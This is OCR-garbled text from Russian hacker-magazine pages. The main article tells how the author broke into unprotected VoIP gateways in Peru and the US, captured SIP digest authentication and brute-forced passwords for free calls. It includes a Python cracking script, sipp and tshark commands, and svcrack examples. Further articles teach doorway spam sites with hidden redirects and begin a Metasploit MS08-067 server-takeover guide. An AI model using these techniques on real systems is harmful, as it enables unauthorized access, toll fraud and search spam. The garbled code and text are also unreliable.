ствия и на уровне самих опе- 
рационныхсистем (О ЕР, А5І_Р, 
5ЕН0Р). Именно благодаря этим 
механизмам порог мастерства 
для человека, разрабатываю- 
щего сегодня эксплойты или за- 
нимающегося поиском уязвимо- 
стей, сильно возрос. 

Александр Матросов, директор 
Центра вирусных исследований и 
аналитики компании Е5ЕТ 



Атеперь оцени, как все усложнилось сейчас. 
Не обязательно глубоко разбираться в этой 
теме, чтобы по одной картинке понять, что 



плохим парням приходится искать все новые 
и новые векторы атак и обходить появившие- 
ся защитные механизмы. 
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■ ■ Алексей «Аддгеззог» Соколов 




Ищем и взламываем ѴоІР-шлюзы 

• Сегодня мы будем развивать интересное умение - поиск шлюзов 
ІР-телефонии и их эксплуатацию. Так, чисто из любопытства. Вполне 
вероятно в результате мы получим полноценный плацдарм для наших 
хакерских опытов и, конечно же, безлимитный телефон. 



С чего все начиналось 

На тему астерисков и подбора паролей к ним написано очень 
много статей. Люди в теме наверняка слышали про набор утилит 
зірѵісіоиз, а многие их даже уже попробовали. 

Однако, когда ты сканируешь сеть при помощи зѵтар.ру (скрипт 
входит в вышеупомянутый комплект), то в Сети помимо астери- 
сков находятся различные ѴоІР-железки, как то: Сізсо, АсИРас, 
Ыпкзуз и так далее. Как правило, у них есть собственный ѵѵеЬ- 
интерфейс. И если ты думаешь, что он запаролен, то ты, навер- 
ное, прав. Но не всегда :]. У Ыпкзуз по умолчанию нет пароля 
на ѵѵеЬ-интерфейсе. А зря, ведь многие их железки могут быть 
доступны извне. 



Осваиваемся 

Переходим к практике. Просканировав пару подсетей, я нашел ѴоІР- 
телефон 5РА-841. Судя по ІР-адресу, он находится в Перу, а кон- 
кретнее — в городеЛима. Я зашел на этот телефон, и оказалось, что 
внутри не выставлен ни пользовательский пароль, ни админский, 
а значит, с ѴоІР-телефоном можно делать что угодно. На телефонах 
Сізсо-500 во вкладке «Ѵоісе->РЬопе» существует поле «Тех! Іодо». И 
его довольно легко поменять. Например, на ряде штатовских шлю- 
зов я проставил фразу «Ітот Риззіа ѵѵііб І_оѵе» и она отображалась 
на дисплее ѴоІР-телефона :). Как правило, после этого у железки 
сразу же менялся ІР (либо на ѵѵеЬ все-таки ставили пароль), и у меня 
пропадал к ней доступ. Но было и такое, что заставка провисела на 



► обо 
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Запрос на регистрацию в консоли астериска 



телефоне две недели, хотя вызовы совершались каж- 
дый рабочий день. В среде администрирования можно 
сменить параметры интернет-соединения, тогда шлюз 
совсем перестанет работать. Можно его запаролить, 
переименовать любые контакты... В общем, на что хватит 
фантазии. Но это все ребячество. Как же из такой наход- 
ки получить реальную пользу? Через ѵѵеЬ, например, я 
вижу, где регистрируется шлюз, какой у него изегпате 
и аиіЬ ісі (если есть), но не знаю пароль. Первым делом 
проверяю, не используется ли пароль, равный логину. 

Это можно сделать, вбив данные в сип-клиент. Обычно 
отображается ошибка 403 (пароль не подходит), однако 
даже в этом случае еще не все потеряно. 

5ІР-регистрация 

Рассмотрим, как происходит процесс БІР-регистрации. 
Изначально клиент отправляет на БоЛзѵѵіІсЬ (например, 
Азіегізк) запрос «РЕѲІ5ТЕР», в котором нет пароля, а 
есть только сопіасЕ В ответ приходит сообщение «401 
ЕІпаиіЬогігесІ», в котором указано, что нужно пройти 
«Оідезі ассезз аиіЬепЕсаЕоп». В присланном сообще- 
нии сгенерированы попсе и геаіпп. Используя попсе 
и геаіт (полученные от сервера), пароль и изегпате 
(прописанные на шлюзе), а также сіідезіигі, шлюз 
генерит тсІ5-хэш — гезропзе — и отправляет все это 
обратно на БоЛзѵѵіІсЬ, который проверяет присланные 
данные. Если они верные, то возвращает 200 ОК, если 
нет — снова 401 . Получается, если достать дамп реги- 
страции, то у тебя окажутся все данные, кроме пароля, 
а его можно будет подобрать. Для этого устанавливаем 
астериск, заводим в нем единственный реег, вбиваем 
изегпате, как на шлюзе, и прописываем любой пароль. 
Затем применяем настройки. 

Простейший пир из/еіс/зір.соггі 

[реги] 

Еуре=-РгіепсІ 

и5еппате=*и5егпате со шлюза* 

зесгеЕ=Іпе11оѵ\/ог1сІ 

ЬозЕ=сІупатіс 

сІІ5а11оы=а11 

а11оы=а1аы 

а11оы=и1аы 



Далее я запускаю на астериске команду ІзЬагк с филь- 
тром по порту 5060 и записью дампа в файл: ЕзЬагк 
рогЕ 5060 -м /Етр/001.рсар. Затем, зайдя на шлюз, 
меняю значение Ргоху на ІР-адрес астериска и жму 




Запрос на регистрацию в ѴѴігезЬагк 



«БиЬтіі аіі СЬапдез». Когда у меня на часах 10 утра, то 
в Перу 2 ночи, так что работать со шлюзом очень удобно 

— можно не опасаться, что перезагрузка шлюза привле- 
чет чье-то внимание. После того как шлюз ребутнулся, в 
ІзЬагк'е ловятся четыре пакета, что означает получение 
всех необходимых данных. Затем я возвращаю прежнее 
значение Ргоху и снова применяю настройки. 

Подбор пароля 

Далее я открываю дамп (например, при помощи 
ѴѴігезЬагк). Там нахожу пакет РЕ0І5ТЕР с гезропзе — 
теперь все данные есть, и дело за малым — написать 
скрипт для подбора пароля. Кстати, можно ловить 
данные и в консоли астериска, для этого набираем в 
СЫ «зір зеі беЬид оп» и смотрим содержимое пакетов. 
Ввиду того, что скрипт, при помощи которого был найден 
шлюз, писался на питоне, я решил не отступать от тра- 
диции и написал очередной сценарий также на питоне. 

В нем мне нужно перебирать весь алфавит. Для этого 
я использовал готовый класс, взятый на доо.дІ/Ваѵии . 

— он решает проблему с генерацией всех возможных 
вариантов пароля и позволяет задать алфавит для пере- 
бора (то есть искать только среди цифр, строчных букв 

и любых их сочетаний). А также задать длину пароля, 
начальное и конечное его значения. 




На самом деле, неза- 
пароленные шлюзы 
можно искать и при 
помощи Соодіе. Если 
в поисковом запросе 
ввести іпЫ;[е: « 5 і р и га 
БРА СопбдигаЬоп», 
то найдется немало 
шлюзов Линксис, на 
которых не выставлен 
пароль. 



# ! /изг/Ьіп/руІіМоп 

ігпрогЕ тсІБ # подключаем библиотеку, 
которая будет генерить тсІ5-хэш 

# дальше идет класс для подбора пароля 
ЕМ = м АВС0ЕР6НІЗКШМ0РдК5ТиѴ1лІХУ2" 

# перечисление алфавитов 

еп = "аЬссІеЕ^ЬідкІтпордгзЕиѵіл/хуі" 

Сііеі*:5 = "1234567890" 
зрасе = " " 

Р = Ѵ-!?;:'ѴУ()" 

ор = "+-*/: Л ()><=" 

а11_зрес = " '~!@#$% л &атр;*-_=+\\|/?.&§Е; ^>'\"; : []{}" 
сіазз АВСІЕегаЕог : 

# . . . здесь следует класс, спертый из интернета :) 

# ... 

# класс закончился, переходим к вводу данных 
и=(гаы_іпри1:( ' изегпате >> ')); 

Ь=(гаы_іпри1:( ' геаіт >> ')); 
т=(гаы_іпри1:( ' теЕЬосІ >> ')); 
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взлом 




5ІР-авторизация 



сі = (гам_іпри1:( ' сІі§е5І:ІІКІ >> 1 )); 
г = (гам_іпри1:( ' гезропзе >> ' )); 
п = (гам_іпри1:( ' попсе >> ' )); 
ргіпі: и,Ь,т,сІ,г,п; 

Ма2= тсІ5.пеіл/(т+" : "+сІ) . Мехсіі^езі: ( ) ; 

# генерим часть Ма2 - она будет использоваться для хэширования 
гезроп5е=0; 

сМ=Ѳ; # в эту переменную будет сохраняться 

# порядковый номер пароля 

-Рог і іп АВСІ1:ега1:ог(5І:аг1:_1еп=1^ з1:ор_1еп=8, аЬс=сІі§і1:5+еп) : 

# указываем, что длина пароля начинается с 1, 

# заканчивается на 8, # и при переборе используются 

# цифры и буквы нижнего регистра 

сИ = сИ+1; 

і-р сМ % 500000 == 0: ргіпі: і; 

# это позволяет выводить на экран только каждый 500000-ый 

# вариант пароля 

Маі = тсІ5.пем(и+" :"+Ь+" :"+і) .ИехсІі§е5і:() ; 

гезропзе = тсІ5.пем(Ііа1+" : "+п+" : "+Иа2) .ІіехсІі§е5І:(); # хэшируем 

і-р г == гезропзе: # сравниваем хэш с полученным от шлюза 
ргіпі: " >", і; 

# если они совпадают, выводит пароль и прекращаем поиск 
ехіі(0); 

Пароль найден 

Итак, скрипт отработал и подобрал пароль, а значит — можно 
прописывать данные в астериск и думать, что регистрация про- 
шла успешно. Новый халявный транк для звонков на Кубу готов :). 
Вообще технологию можно доработать, ведь каждый раз пере- 
бирать пароль нецелесообразно. Имея доступ на шлюз, можно 
менять не только значение Ргоху, но и изегпате. Если найденные 
шлюзы регистрировать всегда на одном и том же сервере, то 
геаіт всегда будет азіегізк, а сіідезіи гі — не меняется. Это значит, 
что достаточно научиться всегда отправлять в ответ на РЕѲІ5ТЕР 
сообщение 401 с постоянным попсе. Тогда можно составлять свою 
таблицу с хэшами паролей, так как все параметры от шлюза к 
шлюзу будут одинаковые (кроме пароля). Нужно перебирать все 
возможные пароли с постоянными геаіт, сіідезіигі, изегпате, 
метод — РЕѲІ5ТЕР, попсе и сохранять в базу соответствие 
«пароль-гезропзе», причем для каждого нового шлюза только 
делать выборку по гезропзе и сразу находить пароль. Затем гене- 
рить в ответ на регистрацию пакет 401 с одним и тем же попсе 
(это может программа зірр). Если составить такую базу данных, то 
можно открывать сервис по восстановлению забытых на шлюзах 
паролей для регистрации, вот только база получится слишком 
объемной :). Чтобы отвечать на РЕѲІ5ТЕР шлюза в зірр, надо 
использовать сценарий: 

Сценарий для зірр — попсе.хті 

<?хт1 ѵег5Іоп="1 .0" епсос11п§= ,, 150-8859-1" ?> 
кзсепагіо пате="ге§із1:ег ,, > 




Статистика работы программы зірр 



<гесѵ гецие5І:= ,, КЕСІ5ТЕК ,, /> 

<5епсІ> 

< ! [СОАТА[ 

5ІР/2.0 401 ІІпаиібогігесІ 

Ѵіа : 5ІР/2 . 0/ІЮР [1оса1_ір] : 5060; 

ЬгапсІі=[ЬгапсІі] ; гесеіѵесІ=[гето1:е_ір] 

Ргот: *изегпате со шлюза* 

<5Ір: *изегпате со шлюза*@*ір с Ав1:егІ5к*> 

То: *ивегпате со шлюза* 

<5Ір: *изегпате со шлюза*@*ір с Аз1:егІ5к*> 

Са11-Ю: [са11_ісІ] 

С5ец : [сзец] КЕСІ5ТЕК 
Бегѵег : Азіегізк РВХ 1.6.2.13 
АІІоы: ІІМѴІТЕ, АСК, САІЧСЕЩ 
ОРТКМБ, ВУЕ, КЕРЕК, БЦВБСКІВЕ, 

ІЧОТІРѴ, ІМРО 

БиррогіесІ: геріасез, іітег 
ІлІІлІІлІ-Аиібепіісаіе: Рі^езі: а1§ог11:11т=М05, 
геа1т="а5І:егІ5к , Ч попсе="17852Ь0а" 

Сопіепі-Іеп^ііі : [Іеп] 

]]> 

</зепсІ> 

</зсепагіо> 

Благодаря опции сгесѵ гециеБІ:=»КЕеі5ТЕК»/> зірр отправит наш 
«магический» пакет только когда придет запрос на регистрацию. 
Останавливаем астериск, чтобы он не отвечал на запросы со 
шлюза, затем создаем сценарий и из этой же папки запускаем 
зірр: 

зірр -5-Р попсе.хті *ір шлюза* -і *ір с Азіегізк* -1:гасе_т5§ \ 

-1 10 -г 1 -гр 1000 

Запускаем Ізбагк с записью в файл и пробуем зарегистрировать 
шлюз. Открываем дамп и снова видим все данные, которые требу- 
ются для перебора. 

Добытые данные можно использовать для подложной регистра- 
ции на сервере, даже не подбирая пароль, но это уже тема для 
другой статьи. Вот такой незамысловатый способ обеспечить себя 
бесплатными звонками, если повезет — то в любую точку мира, а 
если сильно повезет (или если использовать меры предосторож- 
ности), то еще и никогда не поймают :). □с 



► 0б2 
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11 МИЛЛИОН ЕВРО УЩЕРБА 
ОТ ДЕЯТЕЛЬНОСТИ ѴОІР 
ХАКЕРОВ 

Тема взлома ѴоІР-шлюзов звучит нетакуж и часто. Даже если посмо- 
треть последние хакерские конференции, то мода на эту тему немного 
поутихла. Вместе стем в Сети есть немало людей, которые хорошо 
разбираются втеме и умеютэти навыки монетизировать. Показатель- 
ным примером стала недавняя история про двух румынскиххакеров 
Каталина Злейта и Кристиана Сиювата, которые сумели заработать на 
ѴоІР более миллиона евро. Используемые подходы были не слиш- 
ком замысловатыми. Парни сканировали диапазоны ІР-адресов с 
ехіепзіоп'ами, которые имели слабые пароли. Наверное, никто бы 
этого и не заметил, если бы они просто использовали полученные 
аккаунты для бесплатныхзвонков. Ноущерб от их деятельности со- 
ставил примерно 1 1 миллионов евро. Как?! 

Как гласят документы следствия, изначально парни ограничивались 
бесплатными звонками в различных направлениях. Но аппетиты, как 
известно, растут, и ребята быстро смекнули, как можно это монети- 
зировать. За два года они сделали более 23 500 звонков (это 31 5 000 
минут) на платные номера, предлагающие за денежку самые разные 
сервисы (прежде всего справочного типа). Прибыль получаласьот 
участия в партнерских программах с провайдерами этих самых плат- 
ных номеров. Была получена первая прибыль. Осознав, что вдвоем 
заработать много не получится, была создана специальная компания 
ЗЬасІоѵѵСотппипісаІіоп Сотрапу И<± С этого момента бизнес вышел 
на совершенно новый уровень. Нанимая людей и реализовав для 



сотрудников удобный интерфейс (в нем, к примеру, отображались 
цены для звонков на платные номера и специальныеусловия вроде 
ограничения по количеству выполненныхзвонков вдень), они сумели 
достичь совершенно новых вершин. Более того, была организована 
компания, которая сама предоставляла возможность регистрации 
платных номеров, а для более эффективной работы — система рефе- 
ралов, стимулирующая активность. 

Теперь уже становится ясно, откуда взяласьтакая баснословная 
сумма ущерба для честных пользователей ѴоІР. Силами ЗЬасІоѵѵ 
Соттипісабоп Сотрапу было совершено 1 541 187 несанкциониро- 
ванныхзвонков — это 1 1 094 167 минут разговора. Неудивляйся таким 
цифрам: это подсчет из логов, предоставленных ѴоІР-провайдерами. 
Сейчас по делу проходят 42 человека в разных городах Европы. 





на платные номера 



КАК БРУТЯТ 5ІР-АККАУНТЫ? 

Многиеатаки на ѴоІР сводятся к поиску неправильно настроенных 
РВХ (ргіѵаіе Ьгапсб ехсбапде) или, по-русски говоря, офисных АТС. 
Различного рода сканирования, анализ и подбор паролей чаще 
всего осуществляются с помощью упомянутого в тексте статьи набора 
скриптов ЗІРѴісіоиз ( зірѵісіоиг.огд ). написанных на Руібоп'е и рабо- 
тающих под разными ОС. Чтобы лучше понимать материал, вспомним, 
как осуществляются основные действия на простом примере. 

1. Сканирование диапазона подсети (пусть это будет 1 92.1 68.1 .1/24), 
чтобы найти ВРХ. 

[уои@Ьох 5Ірѵісіоиз]$ ./зѵтар 192.168.1.1/24 
| 5ІР Реѵісе | ІІвег А§еп1: 



| 192.168.1.103:5060 | Аз^егізк РВХ | 

Если верить результатам, то АТС найдена на ІР-адресе 192.168.1.103, а 
работает она на базе Азіегізк РВХ. 

2 . Поискехіепііоп'ов (грубо говоря, виртуальных номеров) на найден- 
ной АТС. Эти аккаунты можно будет использовать для осуществления 
звонков. 



[уои@Ьох 5Ірѵісіои5]$ ./зѵыаг.ру 192.168.1.103 
| Ехііепзіоп | Аи1:Ііеп1:іса1:іоп | 



| 123 | гедаіЩІі 



| 100 | гедаиіііі | 

| 101 | поаиіііі | 

Итак, найдено три номера. Мы видим, что номер 1 01 не требует авто- 
ризации. Адля 100 и 123 необходима авторизация. 

3. Подбор пароля, подставляя числовые значения (они используются 
более чем часто): 

[уои@Ьох 5Ірѵісіои5]$ ./зѵсгаск.ру 192.168.1.103 -и 100 
| Ехііепзіоп | РазБмогсІ | 



| 100 | 100 | 

Для ехіепііоп’а «100» пароль подобран! 

4 . Подбор пароля с использованием словаря: 

[уои@Ьох 5Ірѵісіои5]$ ./зѵсгаск.ру 192.168.1.103 -и 123 \ 
-сі сіісіііопагу .ѣхі: 

| ЕхІіепБІоп | РазБыогсІ | 



| 123 | зесгеі: | 

Есть пароль и для номера 1 23! 

Воттак просто мы нашли АТС, рабочие аккаунты и подобрали для них 
пароль. Злоумышленник может подставить найденные логин -пароль 
в свой 51 Р- клиент (например, Х-ІЛе) и осуществить звонки. 
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взлом 



■ ■ М4д ( і с я 884888, зпіррег.ги) 





ДОРВЕИ ДЛЯ САМЫХ 
МАЛЕНЬКИХ 

Пользуемся культовым доргеном гегі.ВиНоп 

• Наверняка ты уже наслышан о таком понятии, как 8Е0. Его часто 
применяют в контексте оптимизации сайтов, раскрутки блогов и так 
далее. Но наибольшую известность получили так называемые серые и 
черные методы 8Е0, которые подразумевают под собой массовое 
создание специально заточенных под поисковики страничек - дорвеев. 
Об этом и поговорим. 



Как это работает? 

Допустим, какой-нибудь богатый и продвинутый человек захо- 
тел купить себе слона :). Первым делом он заходит в свой 
любимый поисковик и вводит ключевую фразу «Купить слона». 
Поисковая машина сразу же выдает ему десятки результатов. 
Конечно же, самые релевантные и самые значимые для наше- 
го потенциального покупателя результаты находятся в первой 
десятке-двадцатке выдачи. Таким образом, перед тобой встает 
задача сделать так, чтобы твой сайт оказался в числе тех самых 



заветных ссылок про покупку слонов, по которым юзер может 
проследовать и все-таки совершить свою покупку. 

Какой в этом толк конкретно для тебя? Смотри: покупатель 
переходит на твой сайт, принимающий участие в партнерской 
программе по продаже слонов, и если покупка совершается, 
то тебе начисляется определенный процент. Здесь действует 
крайне банальное правило: чем больше покупателей слонов 
перейдут на твою страничку и чем больше купят слонов, тем 
больше профита ты получишь. Так что мы ставим логичную 



► 064 
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задачу: выбиться в топ нужного поисковика по опре- 
деленному кейворду. 

Так как простое создание интернет-магазина или 
сайта-участника ПП (партнерской программы) и 
последующая его раскрутка являются крайне долги- 
ми, сложными, и трудозатратными занятиями, очень 
давно некие хитрые люди придумали серые и черные 
методы 5Е0 — не совсем честные способы продви- 
жения в топы поисковиков. 

В данных подразделах поисковой оптимизации 
существуют десятки различных схем работы, раз- 
личающихся по степени приватности и сложности. 
Наша задача на сегодня — научиться работать на 
простейшем уровне с наиболее доступной и легкой 
для освоения специализированной программой — 
доргеном гесГВиНоп. 

Как это выглядит? 

Оставим на время наш дорген и рассмотрим общую и 
самую простую схему работы в серо-черном 5Е0. 
Итак, первым делом запомни один важный совет: 
если ты хочешь работать в данном направлении 
поисковой оптимизации, никогда не отвлекайся по 
мелочам, отдавай всего себя этому делу, а также 
веди скрупулезный лог всего, что ты делал или 
собираешься делать с дорами — твоими специально 
оптимизированными страничками, созданными на 
Ред. Баттоне. 

Вот небольшая схема, которая поможет тебе на пер- 
вых порах: 

1. Выбери направление своей работы. Это могут 
быть РР5 (Рау Рег 5а1е), партнерки (адалт, дэйтинг, 
фарма, казино, софт, шмотки и так далее), РРС (Рау 
Рег С Иск) — любые направления, РРБ (Рау Рег І_еасІ) 
и другие. 

Лучше всего выбирать несколько типов и несколько 
ниш — шансы на успех многократно увеличатся. Но 
также важно не распылять свои усилия, так что огра- 
ничься двумя-тремя вариантами. 

Приводить ссылки на конкретные партнерские про- 
граммы здесь я не буду, поскольку их существует 
великое множество. Выбрать тебе помогут старина 
Гугл и 5Е0-форумы. 

2 . Продвинутые сеошники всегда смотрят выдачу 
поисковиков по интересующему их направлению, 
а затем на базе этих наблюдений разрабатывают 
стратегии продвижения своих ресурсов. Обычно по 
дорам конкурентов можно понять множество инте- 
ресных вещей, которые дадут тебе возможность 
вылезти в серп (выдачу) поисковика. 

3. Собираем ключевые слова. Для этого юзаем Гугл 
или популярные в наше время специализированные 
программы «Анадырь» и «Магадан». Также следует 
заметить, что подавляющее большинство партнер- 



Дорвей, сделанный на гесІ.Вігііоп 

ских программ уже давно предоставляют своим 
вебмастерам специально заточенные под ПП списки 
ключевых слов. 

4 . После сбора кейвордов тебе, конечно же, не стоит 
сразу делать доры по всем ним. Грамотным действи- 
ем будет очистка списка кейвордов от мусора, так 
как нецелевые кейворды — это всегда лишний тра- 
фик и камень, тянущий весь дор вниз по выдаче. В 
большинстве случаев оптимизаторы чистят кейворды 
вручную, но для этого есть и специальные утилиты — 
например, КеуѴѴогбКеерег. 

5 . Генерируем дорвей — подробнее об этом ты смо- 
жешь прочитать ниже. 

6 . Еще одна важнейшая часть процесса продвиже- 
ния в черно-сером 5Е0 — это спам. Конечно, суще- 
ствует целое множество программ для выполнения 
действий такого рода (Хрумер, Апостер, АллСабмитер 
и другие), но все они, как правило, платные, к тому 
же очень дорогие. 

Для тебя, как для начинающего, подойдут следую- 
щие способы спама: 

• ручной спам путем проставления комментариев в 
тематических блогах (например, ты все-таки сделал 
дорвей с ключевой фразой «Купить слона» — сле- 
довательно, ты должен поискать блоги, рассказы- 
вающие о слонах, и оставить в них осмысленные 
комментарии со ссылкой на свой дорвей); 

• профили на трастовых форумах — просто оставля- 
ем ссылки на свой дорвей в ПОДПИСИ; 

• добавляем ссылки на свой дорвей в поисковики с 
помощью их сервисов «АсІсІІМ» (ссылки ищи в сно- 
сках). 

7 . Теперь нам необходимо проследить за своими 
дорами. Это можно делать, опять же, вручную или с 
помощью специализированного софта: Эііе-Аисіііог, 
СопІгоЮоогз и других. 

8 . Подсчитываем выручку и переходим к созданию 
новых дорвеев :). 

Конечно, данная схема довольно общая, но она иде- 
ально подходит для начинающих дорвеестроителей. 

В дальнейшем ты сам сможешь понять на интуитив- 
ном уровне, что и как нужно делать. 

Что такое Ред. Баттон? 

Теперь настало время перейти к, собственно, Ред. 
Баттону. 

Итак, геб.ВиІТоп — это дорген, который существует 
с 2003 года. За это время он один раз менял свое 
название (ранее был Еогит Оепегаіог), множество 
раз — дизайн, а также оброс десятками полезных 
фич. Здесь стоит заметить, что дорген не обновлялся 
с 2008 года, поэтому в Сети расплодилось бесчис- 



> СІѴСІ 

На диске ищи сле- 
дующие полезные 
утилиты: 

• Генератор шабло- 
нов: скрипт, с помо- 
щью которого можно 
генерировать шабло- 
ны к Ред. Баттону; 

• Анадырь 2.3: соби- 
раем кейворды; 

• Мадабап ІЛ:е: со- 
бираем кейворды, 
часть 2; 

• КеуѴѴогсІКеерег4.2.4: 
чистим кейворды; 

• СопЩоЮоОГЗ: КОН- 
трольза дорами; 

• 5іІе АибНог: 
контроль за дорами, 
часть 2; 

• Реб.ВиЦоп 
ТРАЫ5Е0РМЕР: 
дорген. 
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Дорген гесІ.ВігіІоп 

ленное множество его модификаций. Мы будем использовать 
модификацию под названием РесГВиНоп ТРАЫ5Р0РМЕР, ран- 
ние версии которой давно находятся в паблике. 

Системные требования Ред. Баттона заключаются лишь в нали- 
чии на сервере РНР 4-5 с отключенным 5а!е_тосІе. 

Дорген имеет следующий функционал: 

• создание дорвеев почти на всех языках; 

• создание статических и динамических дорвеев; 

• заливка дорвеев на РТР; 

• создание папок для новых доров; 

• использование шаблонов (предустановленные плюс свои); 

• несколько видов зашифрованного редиректа (обычный, 
і-Ргате, азах), а также возможность указать свой код 
редиректа, который автоматически зашифруется (скрипт с 
редиректом может быть вынесен в файл или встроен прямо в 
страницу дора) ; 

• задержка редиректа в секундах; 

• архивация дора перед заливкой; 

• опечатки в тексте с настраиваемой плотностью; 

• возможность убрать сипишные (СР) кеи (например «сбіісі 
ропп») ; 

• карты дора в виде ІтРгпІ-, хті- и гзз-фида; 

• ссылки для спама в обычном виде, в ВВ-коде, НТМІ.+ВВ, для 
БратІТ Ѵіз1:а и для спамилки ѴІР; 

• умеет подсвечивать кеи разными тэгами; 

• может автоматом добавлять в новые доры ссылки на старые 
доры (для перелинковки) ; 

• два алгоритма генерации текста с настройкой читабельно- 
сти и режим «не перемешивания» текста для создания сател- 
литов; 

• возможность генерации текста на странице сразу для 
нескольких кейвордов; 

• настраиваемые варианты названий, расширений и заголовков 
страниц; 

• пакетная генерация доров; 

• множество макросов; 

• профили настроек; 

• парсинг текста с нескольких популярных сервисов; 

• генерация русских и иностранных никнэймов, имен, фамилий; 

• удобный составитель заданий для пакетной генерации. 



Выдача Яндекса по запросу «Купить слона» 

Как видишь, возможности доргена впечатляют, хотя он и не 
является самым функциональным из используемых сеошника- 
ми. А теперь настало время создать свой первый дорвей. 

Дорвей — это легко! 

Для примера мы поставим наш дорген на всем известную 
ѴѴАМР-связку Бепѵѵег. 

Загружай все файлы доргена в папку С:\\А/еЬ5егѵег5\Ьоте\ 
ІосаІНозіЛѵѵѵѵѵѵ и запускай его в браузере по адресу Ыір:// 
ІосаІЬозГ 

После запуска тебе необходимо будет ввести стандартные логин 
и пароль абтіп/абппіп и проследовать в саму админку Ред. 
Баттона. 

Итак, ты оказался в админке доргена и видишь несколько вкла- 
док: «Настроим», «Проверим», «Глянем», «Пакетка». 

Давай по порядку: 

1. Вкладка «Настроим»: 

• заливать дорвей: на тот же сервер; 

• взять кейворды: из файла; 

• отмечаем галочку «Перемешать»; 

• выбираем опцию «взять только X кеев» (если у тебя менее 
тысячи кейвордов, ставь столько, сколько есть, если больше 
- ставь 1000 (после опытов ты сам поймешь, сколько нужно 
брать кейвордов); 

• текст для дора: из файла; 

• ставим галку «Установить точки в больших предложениях» 
(остальные галки можешь пока не ставить); 

• путь к папке с дором: например, «сіоопыауі» (это путь к 
папке с дором на нашем сервере); 

• 1Ж1_ будущего дорвея без «/» в конце: где будет размещать- 
ся наш дор (например, ІтС'Ср : //сіоогмау . сот/сіоопл/ау) ; 

• и, наконец, тебе нужно выбрать тематику дора из выпадаю- 
щего списка . 

В дальнейшем, после набора определенного 5Е0-скилла, ты 
сам осознаешь, какие опции и галки здесь следует отмечать. А 
пока следуй инструкции и переходи на следующую вкладку. 

2. Вкладка «Проверим»: 

• вид дорвея: статический (или с категориями); 

• язык дорвея: русский; 

• шаблон дорвея: 5ирег_раск_1:1іете (ты можешь залить свои 
шаблоны в папку С : \ІлІеЬ5егѵег5\Ііоте\1оса1Ііо5І:\ыыы\уе5\ 

БІіаЬз) ; 

• кейвордов на странице: отмечаем галку и выбираем «Одно- 
страничный дор» или 2-3 кея на страницу, в заголовке тоже 
выбираем 2-3 кейворда; 

• опечатки: выбираем от 1 до 3%; 
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Чистим кейворды 



• убрать СР: отмечаем галку; 

• постов или комментариев: от 2 до 4; 

• использовать редирект: ставим галку; 

• вид редиректа: «Обычный 35» (экспериментируй!); 

• встроить редирект в страницу: ставим галку; 

• куда редиректить: здесь вбивай адрес фида, выдаваемый 
партнерской программой для слива трафика; 

• задержка редиректа: 5 секунд; 

• плотность кеев в тексте: от 3 до 7%; 

• ставим галки: карта сайта (тар . И1:т1 ) , создавать К55, 
создавать 5І1:етар . хті, создавать гоЬоѣз . Ііхі: . 

Остальные опции выбирай на свое усмотрение — в любом слу- 
чае первый блин вполне может выйти комом. Важной состав- 
ляющей в деле дорвеестроительства всегда был эксперимент. 
Идем дальше. 

3. Вкладка «Глянем»: 

• выделение кеев в тексте: «жирный», «особо жирный» и 
«курсив»; 

• текст в доре: отмечай галку «И в текст ссылки добавить», 
вторую галку ты сможешь отметить, если у тебя уже есть 
предыдущие созданные доры; 

• алгоритм генерации текста: офигенный; 

• читабельность текста: хорошая; 

• оставляй дефолтные значения для: заголовок страницы, 

МЕТА Оезсгіріііоп страницы, название страниц, название карт 
дора, расширение страниц. 

Теперь тебе осталось лишь нажать на большую кнопку 
«Поехали!!!» и наблюдать за тем, как генерируется твой первый 
дорвей. 

По окончании генерации дора заходи в папку С:\ѴѴеЬ5егѵег5\ 

Ь о т е\1оса ІГі озііХѵѵѵѵѵѵ, ищи папку «бооп/ѵауі» и заливай все ее 
содержимое по адресу ЬирУ/бооп/ѵау.сот/сІоогѵѵаѵ (адрес дора, 
который ты выбрал при генерации). 

Ожидал большего? На этом все :) Вот так легко и просто ты соз- 
дал свой первый дорвей на Ред. Баттоне. 

Важные моменты 

Теперь осталось прояснить несколько важных и, возможно, не 
совсем понятных для тебя моментов. 



Ц .Міі« ІЗЫЛ ІЧЯІГ ; I т | і і !:: 1^'Ч'ірі 




Приватный дорген 



Итак, во-первых, ты узнал, что в общем случае дорвей генери- 
руется на основе неких ключевых слов и некого уникального 
текста, которые тебе необходимо будет подобрать заранее. 
Во-вторых, важным моментом является тот факт, что шаблон 
дорвея всегда лучше делать уникальным, то есть создавать его 
самому. Для этого нехитрого действия тебе понадобятся базо- 
вые знания НТМІ_ и знание макросов, с которыми работает Ред. 
Баттон (хороший хелп по макросам встроен в сам дорген). 

Также одной из важнейших составляющих успешного дора 
является площадка, где он будет размещен. 

Главным параметром, по которому следует выбирать площад- 
ку, является трастовость домена. Оценивается по косвенным 
признакам, как-то: значение Ѳоодіе РР, доменная зона (лучше 
всего еби и доѵ), Аіеха Рапк. 

Начинающие дорвееводы обычно размещают свои творения на 
фришниках — бесплатных хостингах. Советы по поиску фришни- 
ков ты сможешь почитать на 5Е0-форумах из ссылок в сносках. 

Напоследок 

К сожалению (а может, и к счастью) не существует общего 
рецепта по созданию успешного дорвея. Обычно самые про- 
двинутые сеошники работают с помощью своего самописного 
или покупного софта. У каждого вебмастера есть свои секреты 
по выводу доров в топ. Вряд ли кто-то станет делиться своими 
способами по зарабатыванию несметного количества денег с 
помощью поисковых движков, но ты вполне сможешь почерп- 
нуть кое-какие навыки и умения, немного побродив по спе- 
циализированным блогам и форумам. Желаю тебе успехов на 
поприще 5Е0! □с 
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УГНАТЬ 
ЗА 60 СЕКУНД 

Метод добычи удаленного дедика под 
управлением Ѵѵіпсіоѵѵз 

в Считается, что с каждой новой версией ѴѴіпсІоѵѵз становится все за- 
щищеннее и защищеннее. Даже специалисты АНБ США приложили 
свою тяжелую руку к улучшению безопасности винды. 

Но так ли хорошо защищена ОС ѴѴіпсІоѵѵз в действительности? Давай 
проверим вместе. На практике! 



Готовим операционную 

Сейчас я покажу тебе метод добычи удаленного дедика под управ- 
лением ѴѴіпсІоѵѵз средствами Меіазріоіі Ргатеѵѵогк с использова- 
нием уязвимости М508-067. Почему-то эксплуатация этого бага в 
настоящее время пользуется большой популярностью среди хаке- 
ров Ближнего Востока и Северной Африки, о чем свидетельствуют 
многочисленные записи и обсуждения в РасеЬоок ( : асеЬоок.сот/#!/ 
д гои р.рбр?дісІ=730748 14856 ). хотя на страницах ВКонтакте, посвя- 
щенных тому же самому М5Р ( ѵк.сот/сІиЫ 6499787 ). царит полная 
тишина. В большинстве случаев уязвимыми являются все системы, 

